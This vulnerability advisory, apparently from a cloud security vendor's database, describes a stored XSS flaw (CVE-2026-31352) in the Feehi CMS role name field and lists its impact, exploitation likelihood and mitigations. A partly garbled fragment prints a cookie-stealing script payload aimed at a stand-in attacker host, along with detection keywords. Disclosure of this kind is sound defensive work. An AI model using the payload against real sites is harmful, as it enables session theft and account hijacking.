
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-31352 is an authenticated stored cross-site scripting (XSS) vulnerability in the Role Management module of Feehi CMS v2.1.1. It allows low-privileged authenticated attackers to inject malicious scripts via the Role Name parameter, which are then stored in the database and executed in the browsers of other users who view the affected role. The vulnerability was disclosed on April 6, 2026, with a GitHub Advisory (GHSA-hqjc-wfvx-x2fv) published the same day. It carries a CVSS v3.1 base score of 5.4 (Medium) (Github Advisory, GitHub Issue).
The root cause is improper neutralization of user-controlled input in the Role Name field of the Role Management module (CWE-79). Feehi CMS v2.1.1 fails to sanitize or encode special characters (e.g., <, >, (, )) before storing and rendering role names, allowing an attacker to inject arbitrary HTML or JavaScript payloads. Exploitation requires the attacker to be authenticated with at least low-level privileges sufficient to create or edit roles; the payload executes when another authenticated user (e.g., an administrator) views the role list or creates a new role. A public proof-of-concept with step-by-step reproduction instructions is available on the project's GitHub issue tracker (GitHub Issue).
Successful exploitation allows the injected script to execute in the browser context of any user who views the affected role, including administrators. This can lead to session token theft, account hijacking, unauthorized actions performed on behalf of compromised users, and potential escalation of access within the CMS. Availability is not directly impacted, but confidentiality and integrity are both affected at a low level per the CVSS assessment (Github Advisory, GitHub Issue).
A public proof-of-concept (PoC) with detailed reproduction steps is available on the Feehi CMS GitHub issue tracker, classified as a real exploit with high confidence by Feedly threat intelligence (GitHub Issue). There is no current evidence of active in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.018% (0.037% per GitHub Advisory), placing it in the 11th percentile for exploitation likelihood. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Github Advisory).
<script>document.location='http://attacker.com/steal?c='+document.cookie</script> and save the role.<script>, onerror=, javascript:) in the role name parameter.As of the GitHub Advisory publication (April 6, 2026), no patched version of Feehi CMS has been released — the advisory lists "None" for patched versions (Github Advisory). Recommended mitigations include: (1) implementing server-side input validation and output encoding on the Role Name parameter to neutralize HTML/JavaScript special characters; (2) deploying a Content Security Policy (CSP) header to restrict inline script execution; (3) restricting role creation/management permissions to the minimum necessary users; and (4) monitoring the GitHub repository for an official patch release.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."